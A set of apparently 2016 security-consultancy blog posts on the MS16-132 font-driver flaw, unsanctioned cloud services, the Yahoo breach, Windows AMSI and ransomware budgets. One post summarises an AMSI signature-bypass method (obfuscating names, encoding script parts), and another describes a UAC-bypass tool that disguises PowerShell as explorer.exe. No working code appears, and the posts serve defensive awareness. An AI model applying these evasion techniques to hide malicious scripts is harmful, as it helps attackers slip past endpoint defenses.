What Else Happened on Nov 8th? Patch Day.

Yes November 8th was election day in the USA.

And in the Computer World it is yet another Microsoft Patch Day (2nd Tuesday of month).  So what is so important about yet another patch day?

As a Security pro we must focus on the vulnerabilities that may change our Risk analysis.

So Internet Storm Center tells us that one patch in particular is the most dangerous one – A remote execution vulnerability MS16-132 Graphics componenthttps://isc.sans.edu/forums/diary/November+2016+Microsoft+Patch+Day/21689/

ms16-132secbulletin

A remote execution vulnerability can spawn very dangerous malware for all that can be developed by bad actors to infect our machines.

Bad actors take these announcements and develop malware if they so desire.

hackeratmonitor

 

Why would they desire it? To make money of course. So there are programmers every day that are looking for vulnerabilities to make money on unsuspecting users.

If I click on an unknown spam email or from a supposed known business deal this malware will bypass ALL antivirus software and slam you to the ground. This software vulnerability can cause problems at Microsoft:

 

Which Microsoft software?

Let’s make a list:

Windows Vista, Windows Server2008, Windows 7, Windows Server 2008R2, Windows8.1, Windows 2012, WindowsRT8.1, Windows10, Windows Server2016,

Every single operating system had the following;

Critical
Remote Code Execution

 

And finally near the bottom we find the jucy tidbits:

There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage. The update addresses the vulnerability by correcting how the ATMFD component handle objects in memory.

There are no mitigating factors only a potential workaround by renaming the atmfd.dll file.   Adobe Type Manager and the description says “Windows NT OpenType/Type 1 Font Driver”

atmfd-dllproperties

This is the current culprit. So prepare and test the patches in your environment before updating your environment.

Contact Us if you need help in Devising a new Risk Assessment.

 

Hidden Hacks In Network

I’m often thinking where the next attack can come in and unfortunately it may come where we least expect it.

Spiceworks blogpost has an interesting angle:

How often have cloud services been installed by users without IT department knowledge?

cloudservices-spiceworks-itsurvey

The survey by Spiceworks has found that many IT people have found their users installing cloud services 78% of the time from 2 times to over 5 times.

 

The Cloud applications that IT people are worried about:

  • Cloud Storage (Dropbox, Google Drive, OneDrive) – 35%
  • Webmail (Gmail,Microsoft Exchange Online, Yahoo) – 27%
  • Messaging Services (Google hangouts, Slack, Yammer) – 9%
  • Finance/Accounting applications (Quickbooks Online, FreshBooks) – 8%
  • Productivity Tools(Office Online, Google Docs) – 4%
  • CRM& SFA (Salesforce, Zoho CRM) – 3%
  • Other – 4%

I would think games are also a big portion. Bigger than 4% inside of others.

 

As you read down the list of cloud applications, some are easier to access than others. Gmail, Google hangouts and Google Docs are accessed with a login on a browser.  I think that Google applications are not inherently unsafe it is only when a document is downloaded within Gmail or Google Drive is when the danger goes up. Although many online cloud apps do not require plugins or other software to be downloaded, many do so that is one way of infection (downloaded plugins).

Accessing personal email in the company network with Yahoo, online Exchange, Gmail or any other email service is not just a “breach of protocol”. The user may unknowingly add streams of spam and phishing emails which will try to take over the machine of the user.

So let’s say you invested into  a program or service which checks company emails for viruses and other malware, obviously the personal emails accessed will not be using your ‘safety’ program.  Now all of a sudden more viruses and malware are installed (in a hidden manner).

The same goes for messaging services.  I think it is hard to see that online accounting programs could have malware,  the chance may be less, but it could happen where files are downloaded which have malware in their files.

This is the reason an IPS(Intrusion Prevention System)  is needed.

PAthreat_prevention

It is very hard to accurately predict all user actions so another layer of defense at the Firewall/network would be a good thing.

We know how to do our jobs of defending the network and perimeter, and the hacker finds any nook and cranny to get through this defense.

On the network we have TTP: Tactics Techniques and Procedures. Technology (firewall and endpoint protection), and the procedures are where people are using their personal email in a company computer.

More attacks come on where hackers can get in that is least defended. Like your unknown network devices:

And then if a system (like an IoT – Internet of Things) i.e  a new refrigerator, TV, Lightbulb, and really any other device (like a camera attacking using DDOS in this post) that is on the network can be hacked.

The hacker has tools like ncat and other innocuous  programs that can be used by an enterprising person.

IPS systems properly configured can at least provide some defense to these odd attacks. But there is no foolproof defense – just constant surveillance and review as well as patching, configuration updates as needed.

Not to mention that GRC(Governance, Risk , Compliance)  is also important to keep track of all programs and devices on your network. GRC provides context and priority for attention.

Contact Us to discuss

 

Using Yahoo Email? Should You Notify Customers that Your Email is Breached?

Everyone listening to the news should know by now that Yahoo’s email service has been hacked.   CBSNews story: {Yahoo Confirms Massive hack of 500 million accounts, blames “state actor”}

In Yahoo’s terms of services section DISCLAIMER OF WARRANTIES:

19. b.

YAHOO AND ITS SUBSIDIARIES, AFFILIATES, OFFICERS, EMPLOYEES, AGENTS, PARTNERS AND LICENSORS MAKE NO WARRANTY THAT (i) THE YAHOO SERVICES OR SOFTWARE WILL MEET YOUR REQUIREMENTS; (ii) THE YAHOO SERVICES OR SOFTWARE WILL BE UNINTERRUPTED, TIMELY, SECURE OR ERROR-FREE; (iii) THE RESULTS THAT MAY BE OBTAINED FROM THE USE OF THE YAHOO SERVICES OR SOFTWARE WILL BE ACCURATE OR RELIABLE; (iv) THE QUALITY OF ANY PRODUCTS, SERVICES, INFORMATION OR OTHER MATERIAL PURCHASED OR OBTAINED BY YOU THROUGH THE YAHOO SERVICES OR SOFTWARE WILL MEET YOUR EXPECTATIONS; AND (v) ANY ERRORS IN THE SOFTWARE WILL BE CORRECTED.

 

I’m no legal analyst, but this disclaimer of warranty is not promising they will keep your stuff secure. when it says so in their disclaimer of warranty!!!

 

Are you using Yahoo mail as a business email account? Since Yahoo Mail was hacked and your account likely was one of them, you have to think about this as if a hacker has your account information:

The hacker could look at your email – what can they figure out from your email flow?

Do you use of your Yahoo email account as primary account on logging into other services?

Where do you log in with your yahoo account information (it is the primary email)  wherever that is could cause problems for you.

 

Unfortunately Yahoo is also the email service for many Phone, Cable and Internet service companies, and that means your home email account is now compromised.  For example this story in The Telegraph mentions 8 million accounts now affected in the UK.

 

A hacker could log into your Yahoo account and notice emails which create other hacks.

 

 

So if you re using Yahoo email think about all the places it is being used as a login account name and consider what happens when the hacker has that as well.

 

How are your risk management assessments when the hackers have usernames and passwords in your network?   In fact risk assessment should be changed with that in mind? Does your IT security keep that scenaio in mind?

Should you be looking in your network for data to be retrieved by accounts looking like normal traffic?  Are you reviewing standard traffic for exfiltration of company data?

Now that you know your email has been hacked when do you notify customers? If it was me, I would notify them that my Yahoo account is potentially hacked and will be moving to another company ASAP.

 

Being a little paranoid is not a bad thing in Cybersecurity.

 

Contact Us to discuss the changing liabilities in your Cybersecurity risk management framework with this Yahoo hack or any potential liabilities that you may not have thought of yet.

Windows Good, Bad, and Ugly Security News

There are some interesting Windows News in case you did not notice:

The Good is an instance where Microsoft is reworking their Operating System(for WIndows10) and adding an Anti Malware Security Software called AMSI (AntiMalware Scan Interface)

The Good:

Script Based Attacks in Windows 10’s AMSI – Anti Malware Scan Interface has been developed.  And the following presentation at BlackHat 2016 gives the details:

amsi-inwindows10

This means there is now an additional layer of defense on Windows10 that prevents some scripts from running.

 

The Bad:    An old flaw in Microsoft’s browsers (including the latest one – The Edge) allows an ingenious server to collect your usernames and passwords for your Microsoft account.

From ZDNet story 8/2 microsoftbrowserflaw

 

This means  if you use a Microsoft browser you will not notice when your username and password is stolen by server programs.

 

The Ugly:

The remaining slides in the BlackHat AMSI presentation are spent on how one would bypass the AMSI to attack a computer.

Following are interesting points:

Signature bypass- Obfuscation 

Not really hard to bypass AMSI using this

  1. remove help section
  2. Obfuscate function and variable names
  3. Encode parts of script
  4. Profit

Obfuscation functionality in ISESteroids Module – Fast and very effective at the time of writing.


So what started out as a promising defense mechanism now is already just another program to bypass. There are also ways to bypass AMSI without showing a notification to the user, although it does need elevated privileges (username and password with permissions).

So now what? It figures what started as a method to stop powershell and other scripts AMSI is just another program to bypass. It is as if Microsoft develops their programs without anyone trying to hack them.

 

I have mentioned this before but it is wise to have another entity check you to see if there is anything you missed, or even to just have a different mind look at your creation.

The above instances prove this adage once again.

As far as Microsoft is concerned we all know how important getting the program to the computing population is, and again it is proven that Microsoft tends to err in publishing software rather than waiting and releasing with more tests.

We think testing should be built into your methods:

fixvirussystemengineering

Contact Us to discuss how to improve your security  programs.

What is your Budget in Preventing Unforeseen Attacks?

What if your data is worth hundreds of thousands of dollars? Or liability is in that neighborhood.

Then Ransomware targets your data server and you pay $1000 to save hundred thousand (or more) – assuming of course that you do not have a proper backup in place. Why are you having this problem? Because apparently your IT staff has little direction and is not getting the job done.   Picture from our Cyberjoke v1.91

techsupportcyberjoke

 

databaseimageaccessfromlaptops

If your data is really worth hundreds of thousand$ of dollars then it would be common sense to test your backups periodically but I guess that is not a ‘sexy’ sell. So sometimes backups do not work as advertised and it is cheaper to pay off the Ransomware thieves.

 

There are problems with “pay the ransomware people” of course as  it is possible the ransomware tech support(ha) can’t help you unencrypt your data?

 

Even if you think your IT staff is competent – there are cases where there were problems as Krebs on Security  posts and several businesses paid the ransom as it was cheaper.

The hackers are using sophisticated tactics which elude even good IT personnel.

So let’s say your IT department is sophisticated – and patches ~on time, does their backups, maybe they don’t test enough but everything is working so why break or do something new?

 

The hackers are getting better and using more sophistication like github’s free software provided by professionals across the world:

Bypass-UAC – interesting program

Is self-contained and rewrites Powershell’s PEB(Process Environment Block) to give it the appearance of “explorer.exe”   This provides the same effect because COM objects exclusively rely on Windows’s Process Status API (PSAPI) which reads the process PEB.

Powershell is a program within windows Servers that allows a system administrator to perform specific tasks. And now Powershell can run on Linux as well (as per MSDN – Microsoft Developer Network)

Do you understand what that means?  The hackers can build attacking code with this nice building block and can hide it from the Anti-virus vendors, your IT people, and fancy firewalls.

Even the best IT teams have problems when the attackers are using good tools and programs written for one purpose – to make more money. What is your R&D budget in preventing new unforeseen attacks? The hackers are spending R&D $$.

I have written about this before:

The Criminals are always improving their lot and operate out of lawless  places, which makes them extremely difficult to police.

unsavorycharactorsinyourneighborhood

 

There is a game afoot (whether you are aware or not)

The attackers are pushing and funding efforts to find their equivalent of “Gold Mines”.  A high value server is worth thousands of dollars especially if Ransomware attacks the server.

The criminal hacker has made thousands and even hundreds of thousands of dollars… So guess what  …  they want to make more money every year like the rest of the world. How is it they do that? Spending time and resources into building new attacks.

So if the criminal hacker made 1 million dollars a 10 % R&D budget is $100,000  are you spending $100k in defense?

In fact BusinessInsider has put together a set of data that comes up with $84k per month in revenues for hackers (which is just over a million$ in a year)

trustwavespiderlabshackerincomedata

This image from Trustwave  is assuming 10% exploit kits success and 20,000 users touching this particular site. So in 2015 these hackers potentially made a million dollars.

Just a review of the organization in a hacker/ criminal group (made from Kaspersky Lab  And an older post explaining how Trustwave got to $90k in monthly income.

cybercrime_underground_eng_7-1024x1024Kasperskylab

Survey on IT Defense Budget
 Im trying to find out what people spend on IT defense…

 

So my question “What is your Budget to prevent unforeseen attacks?”  is apt – as I am sure the hackers are spending at least `10% or $100k per year’ on new attacks. The only way we can start to catch up to this IT defense nightmare is to spend a little bit of money on shoring up your defense.  If you are an IT person reading this – please feel free to use some of my data research to convince management to spend “enough” money on defense.

Contact Us to discuss several defense strategies.